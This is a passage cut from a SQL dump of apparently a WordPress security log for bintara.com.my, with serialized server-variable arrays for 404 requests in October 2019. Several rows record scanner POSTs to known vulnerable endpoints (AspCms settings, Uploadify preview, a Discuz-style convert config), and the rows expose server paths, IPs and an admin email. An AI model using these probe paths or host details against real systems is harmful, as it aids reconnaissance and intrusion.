IN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbIy5uPGRWqHYnad24O1pQAAAFc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571959526.2103\";s:12:\"REQUEST_TIME\";s:10:\"1571959526\";}}','notice','2019-10-24 23:25:29','2019-10-24 23:25:26',34927784,36729168,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fonlineelectronicsdeals.blogspot.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'199.34.87.184'),(29029,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3463.1 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"192.169.140.74\";s:11:\"REMOTE_PORT\";s:5:\"34369\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbIyfYethpukHqSvdSbZBAAAAJY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571959421.174\";s:12:\"REQUEST_TIME\";s:10:\"1571959421\";}}','notice','2019-10-24 23:23:43','2019-10-24 23:23:41',34924208,36726800,'https://bintara.com.my/?page_id=18',1,0,'192.169.140.74'),(29028,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:153:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4882.400 QQBrowser/9.7.13076.400\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"199.34.87.184\";s:11:\"REMOTE_PORT\";s:5:\"29397\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbIr8oethpukHqSvdSbWSQAAAJE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571957746.1846\";s:12:\"REQUEST_TIME\";s:10:\"1571957746\";}}','notice','2019-10-24 22:55:47','2019-10-24 22:55:46',34525680,36324384,'https://bintara.com.my/?page_id=18',1,0,'199.34.87.184'),(29026,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:72:\"text/html,application/xhtml+xml,application/xml,image/*;q=0.9,*/*; q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:19:\"utf-8;q=0.7,*;q=0.7\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.5,en;q=0.3\";s:15:\"HTTP_CONNECTION\";s:5:\"Close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:65:\"Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"195.154.168.193\";s:11:\"REMOTE_PORT\";s:5:\"64286\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbIUl@PGRWqHYnad24Ot-QAAAEA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571951767.5101\";s:12:\"REQUEST_TIME\";s:10:\"1571951767\";}}','notice','2019-10-24 21:16:09','2019-10-24 21:16:07',34530552,36338192,'https://bintara.com.my/?page_id=18',1,0,'195.154.168.193'),(29027,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/toughbook-31/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-31/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/toughbook-31/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbInNFm5v7V1jgKJ9Z3B5QAAAVY\";s:12:\"REDIRECT_URL\";s:14:\"/toughbook-31/\";s:11:\"REMOTE_ADDR\";s:13:\"157.55.39.147\";s:11:\"REMOTE_PORT\";s:5:\"21758\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-31/\";s:10:\"SCRIPT_URL\";s:14:\"/toughbook-31/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbInNFm5v7V1jgKJ9Z3B5QAAAVY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571956532.7888\";s:12:\"REQUEST_TIME\";s:10:\"1571956532\";}}','notice','2019-10-24 22:35:36','2019-10-24 22:35:33',33818480,35616576,'https://bintara.com.my/toughbook-31/',1,0,'157.55.39.147'),(29025,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbIStoethpukHqSvdSbJ6gAAAJA\";s:12:\"REDIRECT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"REMOTE_ADDR\";s:12:\"23.228.90.14\";s:11:\"REMOTE_PORT\";s:5:\"57734\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:10:\"SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbIStoethpukHqSvdSbJ6gAAAJA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1571951286.24\";s:12:\"REQUEST_TIME\";s:10:\"1571951286\";}}','notice','2019-10-24 21:08:08','2019-10-24 21:08:06',34872688,36672752,'http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp',1,0,'23.228.90.14'),(29024,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:32:\"/index.php/api/Uploadify/preview\";s:14:\"CONTENT_LENGTH\";s:2:\"66\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:53:\"http://bintara.com.my/index.php/api/Uploadify/preview\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:9:\"PATH_INFO\";s:22:\"/api/Uploadify/preview\";s:15:\"PATH_TRANSLATED\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"23.228.90.14\";s:11:\"REMOTE_PORT\";s:5:\"51369\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:53:\"http://bintara.com.my/index.php/api/Uploadify/preview\";s:10:\"SCRIPT_URL\";s:32:\"/index.php/api/Uploadify/preview\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbISoVm5v7V1jgKJ9Z29pwAAAVY\";s:8:\"PHP_SELF\";s:32:\"/index.php/api/Uploadify/preview\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571951265.5691\";s:12:\"REQUEST_TIME\";s:10:\"1571951265\";}}','notice','2019-10-24 21:07:47','2019-10-24 21:07:46',34868392,36676232,'http://bintara.com.my/index.php/api/Uploadify/preview',1,0,'23.228.90.14'),(29023,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:52:\"/utility/convert/index.php?a=config&source=d7.2_x2.0\";s:14:\"CONTENT_LENGTH\";s:3:\"948\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:73:\"http://bintara.com.my/utility/convert/index.php?a=config&source=d7.2_x2.0\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:25:\"a=config&source=d7.2_x2.0\";s:21:\"REDIRECT_QUERY_STRING\";s:25:\"a=config&source=d7.2_x2.0\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XbISmOPGRWqHYnad24OtNQAAAFQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbISmOPGRWqHYnad24OtNQAAAFQ\";s:12:\"REDIRECT_URL\";s:18:\"/convert/index.php\";s:11:\"REMOTE_ADDR\";s:12:\"23.228.90.14\";s:11:\"REMOTE_PORT\";s:5:\"63727\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:10:\"SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbISmOPGRWqHYnad24OtNQAAAFQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571951256.2741\";s:12:\"REQUEST_TIME\";s:10:\"1571951256\";}}','notice','2019-10-24 21:07:38','2019-10-24 21:07:36',34895328,36699736,'http://bintara.com.my/utility/convert/index.php?a=config&source=d7.2_x2.0',1,0,'23.228.90.14'),(29021,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:131:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.183 Safari/537.36 Vivaldi/1.96.1147.47\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"213.6.117.214\";s:11:\"REMOTE_PORT\";s:5:\"54142\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbINFuPGRWqHYnad24OrVQAAAEA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571949846.3763\";s:12:\"REQUEST_TIME\";s:10:\"1571949846\";}}','notice','2019-10-24 20:44:09','2019-10-24 20:44:06',35023976,36823688,'https://bintara.com.my/?page_id=18',1,0,'213.6.117.214'),(29022,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbISj4ethpukHqSvdSbJyAAAAJE\";s:12:\"REDIRECT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"REMOTE_ADDR\";s:12:\"23.228.90.14\";s:11:\"REMOTE_PORT\";s:5:\"64651\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:10:\"SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbISj4ethpukHqSvdSbJyAAAAJE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571951247.9773\";s:12:\"REQUEST_TIME\";s:10:\"1571951247\";}}','notice','2019-10-24 21:07:30','2019-10-24 21:07:28',35266848,37068760,'http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp',1,0,'23.228.90.14'),(29020,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:32:\"/index.php/api/Uploadify/preview\";s:14:\"CONTENT_LENGTH\";s:2:\"66\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:53:\"http://bintara.com.my/index.php/api/Uploadify/preview\";s